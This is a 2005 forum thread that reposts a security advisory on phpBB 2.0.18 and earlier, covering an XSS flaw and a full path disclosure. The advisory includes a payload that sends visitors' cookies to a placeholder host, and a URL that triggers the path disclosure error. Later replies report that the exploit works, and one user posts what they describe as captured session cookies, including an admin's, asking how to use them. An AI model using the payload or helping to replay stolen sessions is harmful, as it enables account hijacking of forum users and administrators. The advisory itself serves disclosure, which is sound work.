|
|
|
|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 100
Members: 0
Total: 100
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
phpBB 2.0.18 XSS and Full Path Disclosure and lower |
|
Posted: Mon Dec 19, 2005 5:53 pm |
|
|
diegocure15 |
Active user |
|
|
Joined: Sep 22, 2004 |
Posts: 27 |
|
|
|
|
|
|
|
Credit : Maksymilian Arciemowicz
Date : 17.12.2005
Affected Software : phpBB <= 2.0.18
Advisory Text :
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
[phpBB 2.0.18 XSS and Full Path Disclosure cXIb8O3.22]
Author: Maksymilian Arciemowicz (cXIb8O3)
Date: 16.12.2005
from securityreason.com TEAM
- --- 0.Description ---
phpBB is a high powered, fully scalable, and highly customizable Open Source bulletin boar
d package. phpBB has a user-friendly interface, simple and straightforward administration
panel, and helpful FAQ. Based on the powerful PHP server language and your choice of MySQL
, MS-SQL, PostgreSQL or Access/ODBC database servers, phpBB is the ideal free community so
lution for all web sites.
Contact with author http://www.phpbb.com/about.php.
- --- 1. XSS ---
If in phpbb is Allowed HTML tags "ON" like b,i,u,pre and have you in profile "Always al
low HTML: YES" or are you Guest
that you can use this tags:
<B C=">" onmouseover="alert('SecurityReason.Com')" X="<B "> H E L O </B>
Exploit:
<B C=">" onmouseover="alert(document.location='http://HOST/cookies?'+document.cookie)
" X="<B "> H A L O </B>
and have you cookies.
- --- 2. Full Path Disclosure ---
In file admin/admin_disallow.php is
- -25-31---
if( !empty($setmodules) )
{
$filename = basename(__FILE__);
$module['Users']['Disallow'] = append_sid($filename);
return;
}
- -25-31---
function append_sid() dosen't exists. And if you have:
register_globals = On
display_errors = On
Try to go:
http://[HOST]/[DIR]/admin/admin_disallow.php?setmodules=1
- -RESULT ERROR---
Fatal error: Call to undefined function: append_sid() in /www/2018/phpBB2/admin/admin_disa
llow.php on line 28
- -RESULT ERROR---
- --- 3. Greets ---
sp3x
- --- 4.Contact ---
Author: Maksymilian Arciemowicz < cXIb8O3 >
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
securityreason.com TEAM
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (FreeBSD)
iD8DBQFDpDtC3Ke13X/fTO4RAosCAJkBcYRNbHKDGeuwnY1U/WXMhzDnVQCgl39D
/0u14EN2sQAh1Bwu0yvT48Q=
=lsL8
-----END PGP SIGNATURE-----
Original source http://securityreason.com/securityalert/269 |
|
|
|
|
|
|
|
|
Posted: Tue Dec 20, 2005 6:09 pm |
|
|
robin1200 |
Regular user |
|
|
Joined: Sep 13, 2005 |
Posts: 19 |
|
|
|
|
|
|
|
Exploit works...only problem is that I can only see my own cookie...
|
|
|
|
|
|
i Have sucessfully exploited |
|
Posted: Wed Dec 21, 2005 4:04 pm |
|
|
ctf |
Beginner |
|
|
Joined: Dec 21, 2005 |
Posts: 2 |
|
|
|
|
|
|
|
i have sucessfully exploited and i have some cookies with me one of them is admins and i want to know how can it be used ?
the cookie is
phpbb2mysql_data=a:2:{s:11:\"autologinid\";s:0:\"\";s:6:\"userid\";s:2:\"16\";}; phpbb2mysql_data=a:2:{s:11:\"autologinid\";s:0:\"\";s:6:\"userid\";i:-1;}; phpbb2mysql_sid=d78d343d22d2871efec69f65854179db; phpbb2mysql_t=a:7:{i:2;i:1135074105;i:191;i:1135062519;i:33;i:1135053718;i:95;i:1135054130;i:89;i:1135062766;i:206;i:1135062837;i:247;i:1135072242;} |
|
|
|
|
Posted: Wed Dec 21, 2005 8:31 pm |
|
|
super |
Active user |
|
|
Joined: Sep 19, 2005 |
Posts: 30 |
|
|
|
|
|
|
|
how do you use this exploit?? can you give me video clip about it. |
|
|
|
|
Posted: Sat Dec 31, 2005 1:13 pm |
|
|
WaterBird |
Active user |
|
|
Joined: May 16, 2005 |
Posts: 37 |
|
|
|
|
|
|
|
Wate of time because "If in phpbb is Allowed HTML tags "ON"". I know the phpbb forums have HTML tags off after instalation, and there is not mutch forums that have html tags on. |
|
|
|
|
www.waraxe.us Forum Index -> PhpBB
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|